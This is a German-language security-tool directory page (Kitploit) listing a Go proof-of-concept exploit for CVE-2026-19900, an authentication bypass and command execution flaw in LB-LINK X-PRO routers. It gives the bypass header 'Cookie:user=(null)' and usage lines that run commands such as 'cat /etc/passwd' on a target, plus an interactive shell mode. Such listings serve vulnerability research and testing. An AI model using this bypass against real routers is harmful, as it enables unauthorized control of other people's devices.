Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-19900-PoC — Proof-of-Concept-Exploit für CVE-2026-19900, eine Authentifizierungsumgehungs- und Remote-Codeausführungs-Schwachstelle in LB-LINK X-PRO-Routern, die die Ausführung von Befehlen über ein manipuliertes Null-User-Cookie ermöglicht. | Kitploit
Tools/GitHubGitHub/on3sk-0x1/cve-2026-19900-poc
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierung
GitHubon3sk-0x1/cve-2026-19900-poc

cve-2026-19900-PoC

Proof-of-Concept-Exploit für CVE-2026-19900, eine Authentifizierungsumgehungs- und Remote-Codeausführungs-Schwachstelle in LB-LINK X-PRO-Routern, die die Ausführung von Befehlen über ein manipuliertes Null-User-Cookie ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 5h 11mNoch nicht geprüft

CVE-2026-19900 LB-LINK X-PRO Authentifizierungsumgehung und RCE über Null-Benutzer

CVE-2026-19900 Hartcodierte Anmeldedaten und Authentifizierungsumgehung RCE über Null-Benutzer.

Umgehung über Header: Cookie:user=(null)

Verwendung

Erstellen und Ausführen des Skripts mit einem Zielhost:

root@kitploit:~
go build cve-2026-19900-PoC.go
./cve-2026-19900-PoC -t http://target:8080/ -c "id"

Ohne Build

root@kitploit:~
go run cve-2026-19900-PoC.go -t http://target:8080/ -c "cat /etc/passwd"

Interaktiver Modus

root@kitploit:~
./cve-2026-19900-PoC -t http://target:8080/ -i

Argumente

  • -t: Ziel-IP-Adresse oder Hostname (erforderlich)
  • -c: Sende cmd-Payload
  • -i: Interaktiver Modus (benötigt kein -c <cmd>)

Nuclei-Vorlage: (Vorlage von 0x_Akoko)

https://cloud.projectdiscovery.io/library/CVE-2026-19900

Referenz

https://github.com/glkfc/IoT-Vulnerability/blob/main/LB-LINK/LB-LINK_cmd%20Indicates%20the%20unauthorized%20command%20injection/The%20LB-LINK_cmd%20command%20is%20used%20to%20inject%20information.md https://nvd.nist.gov/vuln/detail/CVE-2026-19900 https://github.com/DavCloudz/cve/blob/main/B-Link/B-Link%20AC1200%20X-PRO(AC6)%20Hardcoded%20Credentials%20Vulnerability.md https://vuldb.com/cve/CVE-2026-19900 https://vuldb.com/submit/870712

Tool herunterladen